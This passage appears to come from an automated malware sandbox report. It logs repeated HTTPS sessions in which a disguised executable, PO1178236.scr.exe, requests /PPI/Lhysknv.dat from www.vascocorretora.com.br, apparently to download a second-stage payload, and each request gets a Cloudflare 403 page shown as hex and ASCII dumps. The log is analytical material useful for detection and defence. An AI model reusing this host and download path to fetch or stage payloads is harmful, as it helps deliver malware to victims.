72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c16fbbdf431a</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:19 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 36 66 62 62 64 66 34 33 31 61 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c16fbbdf431a',t:'MTczNjQwODE3OS4wMDAwMDA='};var
        2025-01-09 07:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        38192.168.2.949746188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:19 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:19 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:19 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:34 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9fr94RVrF2yoUlBYNRyQe7E5aeaaS7TaEfuBVk%2FpuRK12XoZln2VdDmGnSh3OAclTCmHohfrMPvWMb4pbNwKcmHO8jcOkaOaYskJsfq7mMBX%2BKAQUSZti%2Fy4v1bcHONaBnHK%2Bov1Z8H6cjF"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1738c83efa9-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=2029&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1437007&cwnd=159&unsent_bytes=0&cid=3a3f25b00f5a3cbb&ts=156&x=0"
        2025-01-09 07:36:19 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:19 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:19 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:19 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 37 33 38 63 38 33 65 66 61 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1738c83efa9</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:19 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 37 33 38 63 38 33 65 66 61 39 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 33 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1738c83efa9',t:'MTczNjQwODE3OS4wMDAwMDA='};var
        2025-01-09 07:36:19 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        39192.168.2.949747188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:20 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:20 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:20 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:35 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ctwz1e3fX2CI8dZND9uh8EMy2xYQR3z3GRfmXwSPMOiy08BfJPP0FvRZrzmMx7CZOtFPLrfuGkloJ07VgcIQ3UO17%2BZJ%2F2rm8YF8n%2FLWx52XFhK1fCQ2yHic4w9f%2BxIgG5VTg7kiu32sRRAU"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1775ecc1921-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1646&rtt_var=631&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1713615&cwnd=139&unsent_bytes=0&cid=56a39ed53bef70f9&ts=128&x=0"
        2025-01-09 07:36:20 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:20 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:20 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:20 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 37 37 35 65 63 63 31 39 32 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1775ecc1921</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:20 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 37 37 35 65 63 63 31 39 32 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1775ecc1921',t:'MTczNjQwODE4MC4wMDAwMDA='};var
        2025-01-09 07:36:20 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        40192.168.2.949748188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:20 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:21 UTC1006INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:21 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:36 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NejdcFCFxpmoCNwxik6qQFI1w%2BOFivyIUVh9igAotw3PUZJFaMLZtPXlVsb44J0E%2BgXi5UABPY9PDZBp3e0W6%2FpcyElA3q0Cyubdn4xOOq8PNZKtoXDRZ6XgoZEvCt5mhbxf4o%2FoxfAZG4J2"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c17b3ae24273-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2196&min_rtt=2189&rtt_var=835&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1299510&cwnd=32&unsent_bytes=0&cid=281178f5f10e4977&ts=153&x=0"
        2025-01-09 07:36:21 UTC363INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:21 UTC1369INData Raw: 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76
        Data Ascii: lare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=dev
        2025-01-09 07:36:21 UTC1369INData Raw: 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.capt
        2025-01-09 07:36:21 UTC1369INData Raw: 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 37 62 33 61 65 32 34 32 37 33 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22
        Data Ascii: left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c17b3ae24273</strong></span> <span class="cf-footer-separator sm:hidden"
        2025-01-09 07:36:21 UTC999INData Raw: 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 37 62 33 61 65 32 34 32 37 33 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 34 4d 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20
        Data Ascii: dow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c17b3ae24273',t:'MTczNjQwODE4MS4wMDAwMDA='};var
        2025-01-09 07:36:21 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        41192.168.2.949749188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:21 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:21 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:21 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
